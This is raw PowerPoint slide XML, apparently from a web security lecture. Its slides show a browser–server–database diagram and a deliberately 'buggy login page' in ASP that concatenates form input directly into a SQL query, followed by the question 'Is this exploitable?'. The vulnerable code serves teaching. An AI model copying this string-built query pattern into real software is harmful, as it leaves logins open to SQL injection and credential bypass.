          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>receive valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14351" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2225675" y="23780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a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14352" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7207250" y="3090863"/>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a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14353" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2743200" y="37338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a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14354" name="Freeform 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2152650" y="2773363"/>
            <a:ext cx="4400550" cy="1703387"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T1" fmla="*/ 1703387 h 1703387"/>
              <a:gd name="T2" fmla="*/ 3295651 w 4400550"/>
              <a:gd name="T3" fmla="*/ 131762 h 1703387"/>
              <a:gd name="T4" fmla="*/ 0 w 4400550"/>
              <a:gd name="T5" fmla="*/ 912812 h 1703387"/>
              <a:gd name="T6" fmla="*/ 0 60000 65536"/>
              <a:gd name="T7" fmla="*/ 0 60000 65536"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 w 4400550"/>
              <a:gd name="T10" fmla="*/ 0 h 1703387"/>
              <a:gd name="T11" fmla="*/ 4400550 w 4400550"/>
              <a:gd name="T12" fmla="*/ 1703387 h 1703387"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T6">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T7">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T8">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T9" t="T10" r="T11" b="T12"/>
            <a:pathLst>
              <a:path w="4400550" h="1703387">
                <a:moveTo>
                  <a:pt x="4400550" y="1703387"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="4032250" y="1179512"/>
                  <a:pt x="4029076" y="263524"/>
                  <a:pt x="3295651" y="131762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2562226" y="0"/>
                  <a:pt x="1098550" y="601662"/>
                  <a:pt x="0" y="912812"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none"/>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3554" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="228600"/>
            <a:ext cx="8686800" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example:  buggy login page  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>(ASP)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303555" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1295400"/>
            <a:ext cx="8229600" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ok = execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>* FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  WHERE user=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp;  form(“user”)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>" ' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   AND   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp; form(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”) &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>not ok.EOF   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>		login success  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>else  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fail;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>this exploitable?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{211D6FF2-307B-45F8-8CB1-4C00E9065EA9}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="228600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effec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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3111500" y="1836738"/>
            <a:ext cx="1274763" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1836738"/>
            <a:ext cx="1395413" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>Browser</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>(Client)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7412037" y="1836738"/>
            <a:ext cx="1274763" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1"/>
              <a:t>DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1833563" y="3016250"/>
            <a:ext cx="1298575" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1866900" y="4025900"/>
            <a:ext cx="1181100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1812925" y="1811338"/>
            <a:ext cx="1341438" cy="1190625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Enter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22537" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="1981200"/>
            <a:ext cx="3025774" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92172" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
